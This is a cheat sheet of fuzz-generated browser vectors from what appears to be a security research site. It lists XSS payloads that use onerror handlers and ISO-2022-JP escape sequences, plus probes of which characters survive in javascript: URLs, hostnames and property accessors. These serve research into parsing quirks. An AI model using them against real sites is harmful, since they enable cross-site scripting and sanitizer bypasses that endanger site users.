Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 174 vectors with results
let transformedChr = String.fromCodePoint(0).toUpperCase();0x0D
0 > 0x7f &&0x0D
/^\w+$/.test(transformedChr) &&0x0D
alert(0 + '=>' + transformedChr)This vector demonstrates which codePoints transform to ascii characters when using toUpperCase() Related vector: https://shazzer.co.uk/vectors/661713f26438aee019a61a71
<a id="0x1B$@"></a>0x1B(B<a id="><img src=x onerror=alert(64)></a>Which escape sequences will result in scrambled HTML.
<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>Which escape sequences will result in scrambled HTML.
let transformedChr = String.fromCodePoint(0).toLowerCase();0x0D
0 > 0x7f &&0x0D
/^\w+$/.test(transformedChr) &&0x0D
alert(0 + '=>' + transformedChr)This vector demonstrates which codePoints transform to ascii characters when using toLowerCase() Related vector: https://shazzer.co.uk/vectors/661713f26438aee019a61a71
<0x1B(<img src onerror=alert(60)>This vector demonstrates how to use the new bytes placeholder. Here we are fuzzing the characters to perform an ASCII escape sequence in ISO-2022-JP.
<0x1B(Bimg src onerror=alert(66)>This vector demonstrates how to use the new bytes placeholder. Here we are fuzzing the characters to perform an ASCII escape sequence in ISO-2022-JP.
<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>Which escape sequences will normalize back to valid HTML
<a id="0x1B$B"></a>0x1B(J<a id="><img src=x onerror=alert(74)></a>Which escape sequences will normalize back to valid HTML
anchor.href='/0x09/example.com';0x0D
if(anchor.host === 'example.com')alert(9)This vector shows what characters are allowed inside slashes on an anchor href
anchor.href='///example.com';0x0D
if(anchor.host === 'example.com')alert(47)This vector shows what characters are allowed inside slashes on an anchor href
anchor.href='/\/example.com';0x0D
if(anchor.host === 'example.com')alert(92)This vector shows what characters are allowed inside slashes on an anchor href
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This vector shows what characters can be used to separate HTML attributes
This vector shows what characters can be used to separate HTML attributes
This vector shows what characters can be used to separate HTML attributes
document⟦09⟧['location'];alert(9)List of characters allowed between an object and the first bracket notation.
document
['location'];alert(10)List of characters allowed between an object and the first bracket notation.
document0x0B['location'];alert(11)List of characters allowed between an object and the first bracket notation.
document0x0C['location'];alert(12)List of characters allowed between an object and the first bracket notation.
document0x0D['location'];alert(13)List of characters allowed between an object and the first bracket notation.
<a href="https://0x09example.com/" id="test9"></a><a href="https://
example.com/" id="test10"></a><a href="https://0x0Dexample.com/" id="test13"></a><a href="https:///example.com/" id="test47"></a><a href="https://@example.com/" id="test64"></a>if (new URL(String.fromCodePoint(0) + "javascript:alert()").protocol=="javascript:"){alert(0)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(1) + "javascript:alert()").protocol=="javascript:"){alert(1)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(2) + "javascript:alert()").protocol=="javascript:"){alert(2)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(3) + "javascript:alert()").protocol=="javascript:"){alert(3)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(4) + "javascript:alert()").protocol=="javascript:"){alert(4)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
const c = String.fromCodePoint(i)0x0D
const c_upper = c.toUpperCase()0x0D
if (c_upper.length > c.length && isASCII(c_upper)){0x0D
alert(c)0x0D
}Useful to bypass strict length checks and differentials between toUpperCase() / toLowerCase() .
<div style="/**/color:red;">test</div><div style="font-family:'blah';color:red"></div><a href="//test.com/" id="test47"></a>I want to know which character after a slash is considered a slash and creates a protocol
<a href="/\test.com/" id="test92"></a>I want to know which character after a slash is considered a slash and creates a protocol
window⟦09⟧.alert();alert(9)List of characters allowed between an object and the dot operator located before the method/property.
window
.alert();alert(10)List of characters allowed between an object and the dot operator located before the method/property.
window0x0B.alert();alert(11)List of characters allowed between an object and the dot operator located before the method/property.
window0x0C.alert();alert(12)List of characters allowed between an object and the dot operator located before the method/property.
window0x0D.alert();alert(13)List of characters allowed between an object and the dot operator located before the method/property.
const c = String.fromCodePoint(i);0x0D
0x0D
if (c.length !== c.toUpperCase().length) alert(i)if (new URL("https://example.co" + String.fromCodePoint(9) + "m").hostname === 'example.com'){alert(9)}Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.co" + String.fromCodePoint(10) + "m").hostname === 'example.com'){alert(10)}Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.co" + String.fromCodePoint(13) + "m").hostname === 'example.com'){alert(13)}Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.co" + String.fromCodePoint(173) + "m").hostname === 'example.com'){alert(173)}Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com"
if (new URL("https://example.co" + String.fromCodePoint(847) + "m").hostname === 'example.com'){alert(847)}Checks what characters can be added in the middle of "https://example.com", while keeping the hostname "example.com"